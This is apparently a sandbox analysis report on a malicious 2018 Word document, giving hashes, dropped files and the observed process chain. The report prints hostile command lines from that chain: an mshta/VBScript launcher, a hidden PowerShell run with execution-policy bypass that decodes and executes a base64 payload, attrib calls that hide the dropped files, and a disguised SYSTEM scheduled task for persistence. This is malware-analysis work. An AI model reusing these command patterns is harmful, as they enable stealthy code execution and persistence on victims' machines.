  - Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/WQL"
  - Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/cimbinding/AssociationFilter"
  - Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/wsman/results"
  - Heuristic match: "wscript.echo L_Text_Msg_General01_Text & L_Space_Text & oDriver.Name"
  - Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/wmi"
  - Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2"
  - Pattern match: "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2"
  - Pattern match: "http://schemas.microsoft.com/wbem/wsman/1"
  - Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
  - Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Service?Name=WinRM"
- source: File/Memory
- relevance: 10/10
- note: these are string constants found in file and memory content (WS-Management schema URIs and a wscript.echo help line), not contacted endpoints; the Network Analysis section records no DNS requests, hosts or HTTP traffic during the run.
File Details
d15aee026074fbd18f780fb51ec0632a.doc
- Filename: d15aee026074fbd18f780fb51ec0632a.doc
- Size: 960KiB (983040 bytes)
- Type: doc office
- Description: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 12 11:20:00 2018, Last Saved Time/Date: Tue Feb 13 06:52:00 2018, Number of Pages: 1, Number of Words: 26, Number of Characters: 152, Security: 0
- Architecture: WINDOWS
- SHA256: af5f102f0597db9f5e98068724e31d68b8f7c23baeea536790c50db587421102
- MD5: d15aee026074fbd18f780fb51ec0632a
- SHA1: 352687a98fb232e5614f7ce7cd57512553535915
- ssdeep: 12288:5XxYnZLfy5r9uJxShtcfUK58ejANqsqZ/ZpUPNj+H8dUpKh4L1g1rX3:5X+NC9jhtUJuejkqNBp1jKR1
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 8 processes in total.
-
WINWORD.EXE
/n "C:\d15aee026074fbd18f780fb51ec0632a.doc"
(PID: 3212)
-
wscript.exe
"%ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs"
(PID: 3392)
-
mshta.exe
vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));"",0 "))
(PID: 2844)
-
powershell.exe
-w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));
(PID: 3784, Additional Context: [System.Text.Encoding]::Unicode.GetString(FromBase64String((getontent %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))); [System.Text.Encoding]::Unicode.GetString(FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))))
- attrib.exe +s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs (PID: 2372)
- attrib.exe +s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini (PID: 2640)
- schtasks.exe /Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareByteSDK /TR "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs" /F (PID: 3076)
- Setup.exe -Embedding (PID: 2948)
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
-
Clean 1
-
-
~_5aee026074fbd18f780fb51ec0632a.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/54
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
-
Informative Selection 2
-
-
ConfManagerNT.vbs
- Size
- 57KiB (58208 bytes)
- Type
- doc office
- Description
- Little-endian UTF-16 Unicode text, with very long lines
- Runtime Process
- wscript.exe (PID: 3392)
- MD5
- 41be15634bb46ae6a9bc797cad6c247a
- SHA1
- 151389f95d521a2aae1a0eadba9886f05136128b
- SHA256
- 3607432758176a2c41a1971b3c4d14a992a68b231851f8b81c6e816ea9ea29b2
-
ProjectConfManagerNT.ini
- Size
- 433KiB (443124 bytes)
- Type
- text
- Description
- Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 6cba575777b86ee511ee6f8ca1069c69
- SHA1
- db92bfe98bf909efecd1ebd7b5d1fb5f16643fe5
- SHA256
- c75b3b8d5996371fbe149d86276ebac0bdacebd813e127ca36e465ff12fba35c
-
-
Informative 12
-
-
d15aee026074fbd18f780fb51ec0632a.LNK
- Size
- 573B (573 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 8 13:20:27 2018, mtime=Sat Dec 8 13:20:27 2018, atime=Sat Dec 8 13:20:36 2018, length=983040, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 9b47d3475d5c0834fc8ef86eecd6222c
- SHA1
- ee1bef08126061aeeabbe6fc84e89f33df832f45
- SHA256
- 47866fe45fe0ed8d531e6fcbb085fa7af0cdaa86fba2fa09ef0361693f50f3ad
-
index.dat
- Size
- 160B (160 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 77f2fc3bb3b8e836e2eccd54bd4d0a79
- SHA1
- 2f19b3006d4c415e103f14bdb6ddf6432619eb76
- SHA256
- f5de60f27d76d5670d363d484efde7383b98baa81a72dbe62b5ee31e65d16596
-
17GPJA9KU9GW9OODB6Z0.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3784)
- MD5
- 5f61faebbc0b9eb2c01a8b7ab2707550
- SHA1
- a0af638a4496eafca0687101a8b6e124ff78150e
- SHA256
- 95ae34ca8941d1e781af68350dc18902134e83b2f0b3f5575aa8d1c39080d989
-
10201FDC.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- ce38d7842a557a35ee57f77deb7c6034
- SHA1
- c5df97bd8057a28a1e12d0f666f4b4bec9d2ba47
- SHA256
- d2a9e53f840cda2f26ea267fdc6bd5a875735ca6e210008155f093f75491d09c
-
BACF462D.wmf
- Size
- 370B (370 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 5f11918b90cd989c4b9877754e79cb58
- SHA1
- 7869e38dd2a29433c15484c1ef4e5fd0b7288e10
- SHA256
- f8875fb95b08d4aee63c107874994fb3fb8d59008abc88cb29041661ce0ba20e
-
MSForms.exd
- Size
- 163KiB (166724 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 98e2ae1936af0e0d4f073143bee1b39f
- SHA1
- b1f1113aecc1a5f2f40b8103f635511439493ade
- SHA256
- 4fea7f43673ec6817dba9c0af5447f9ac9deb223684076305a8a55531738b112
-
~WRS_12145297-CBEE-4101-BDC6-F8BD546DB9A4_.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- c537015894075562542dba0fc0e7d5e0
- SHA1
- 8f122da855b5258dbcb4bbb88bd1b7b0138bb9d3
- SHA256
- 670a0b9c88714122c15eb8927a55dc9c22eb10c99b10a08f0dcb9425bd846c95
-
~WRS_A3F12A40-44A8-4808-8AB8-97799042790C_.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
SetupExe_20181208163200B84_.log
- Size
- 4.3KiB (4387 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- MD5
- 1e77557690d464826c37b0b8a6418867
- SHA1
- 71500938465f8fb76d452c25819a403ed61118f9
- SHA256
- 59e2c9790c8a95c92a576a0b0cf2231569ff3a62156b36eadd57cdb2f817bc4a
-
ExcludeDictionaryEN0409.lex
- Size
- 2B (2 bytes)
- Type
- text
- Description
- Little-endian UTF-16 Unicode text, with no line terminators
- MD5
- f3b25701fe362ec84616a93a45ce9998
- SHA1
- d62636d8caec13f04e28442a0a6fa1afeb024bbb
- SHA256
- b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
-
GimmeSetup_20181208163340B84_.log
- Size
- 49KiB (49961 bytes)
- Type
- text
- Description
- ASCII text, with very long lines, with CRLF line terminators
- MD5
- cc0c91b29c9747b4e3833444a5a8ea43
- SHA1
- 59777b245438d26ae7fa2cf586dc86202aa46f43
- SHA256
- fc0b0f0ff1abf111914d9b5988484bb5b602b1d790a85796211a0bf9c1da9924
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Network whitenoise filtering was applied
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-51" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Some low-level data is hidden, as this is only a slim report